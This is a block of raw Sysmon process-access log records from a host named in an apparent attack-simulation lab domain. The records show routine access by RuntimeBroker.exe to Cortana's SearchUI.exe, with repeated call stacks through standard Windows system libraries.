12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
